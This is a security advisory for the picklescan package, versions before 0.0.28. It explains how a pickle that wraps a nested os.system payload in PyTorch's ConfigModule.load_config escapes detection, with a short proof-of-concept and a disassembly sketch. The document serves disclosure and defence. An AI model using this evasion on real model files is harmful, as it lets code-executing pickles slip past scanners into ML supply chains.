
GHSA-vv6j-3g6g-2pvj picklescan

Package

Manager: pip
Name: picklescan
Vulnerable Version: >=0 <0.0.28

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:P/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: N/A (percentile: N/A)

Details

Picklescan missing detection when calling PyTorch function torch.utils._config_module.load_config

### Summary

`torch.utils._config_module.load_config` is a PyTorch library function that loads (unpickles) the payload passed to it. A pickle file that routes its malicious content through this function is not flagged by Picklescan versions before 0.0.28.

### Details

The attack payload executes in the following steps:

1. The attacker crafts the payload by returning a call to the `torch.utils._config_module.load_config` function from a `__reduce__` method, with the actual malicious code hidden inside a nested pickle passed as its argument.
2. The victim checks whether the pickle file is safe using the Picklescan library. Because Picklescan does not detect any dangerous functions, the victim calls `pickle.load()` on the malicious file, and `load_config` unpickles the nested payload, leading to remote code execution.

### PoC

```python
import os
import pickle

from torch.utils._config_module import ConfigModule

class Evil:
    def __reduce__(self):
        # Inner payload: runs a shell command when unpickled.
        return (os.system, ('whoami',))

class EvilTorchUtilsConfigModuleLoadConfig:
    def __reduce__(self):
        # Outer payload: wraps the inner pickle in a call to
        # ConfigModule.load_config, which unpickles its argument.
        evil_payload = pickle.dumps(Evil())
        return ConfigModule.load_config, (None, evil_payload)
```

### Impact

Who is impacted? Any organization or individual relying on Picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by the scanner but executes when the pickle file is loaded.

Supply chain attack: attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

### Credits

https://github.com/FredericDT
https://github.com/Qhaoduoyu
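As a supplementary sketch of why an import-based scan misses the PoC above (not part of the advisory itself; the class name `Outer` and the harmless inner payload are illustrative, and `torch` must be installed), the outer pickle stream can be disassembled with the standard library's `pickletools`. The only global the stream references is `ConfigModule.load_config` from `torch.utils._config_module`; the inner pickle that would carry the `os.system` call travels as an opaque bytes argument, so a scanner that treats `load_config` as safe sees nothing suspicious.

```python
import pickle
import pickletools

from torch.utils._config_module import ConfigModule


class Outer:
    """Minimal stand-in for the PoC's outer payload class (illustrative)."""
    def __reduce__(self):
        # The nested pickle is a harmless string here; in the real PoC it
        # would contain the os.system payload.
        return ConfigModule.load_config, (None, pickle.dumps("harmless"))


data = pickle.dumps(Outer())

# The disassembly shows the stream importing from torch.utils._config_module
# (ConfigModule / load_config), while the nested pickle appears only as an
# opaque bytes argument rather than as a visible dangerous import.
pickletools.dis(data)
```

Per the affected range above, upgrading to picklescan 0.0.28 or later closes this particular detection gap.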

Metadata

Created: 2025-08-22T16:58:14Z
Modified: 2025-08-22T16:58:14Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-vv6j-3g6g-2pvj/GHSA-vv6j-3g6g-2pvj.json
CWE IDs: ["CWE-345"]
Alternative ID: N/A
Finding: F204
Auto approve: 1